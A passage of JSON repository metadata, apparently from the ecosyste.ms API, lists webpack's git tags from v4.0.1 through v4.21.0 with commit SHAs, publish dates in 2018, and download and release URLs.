:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/we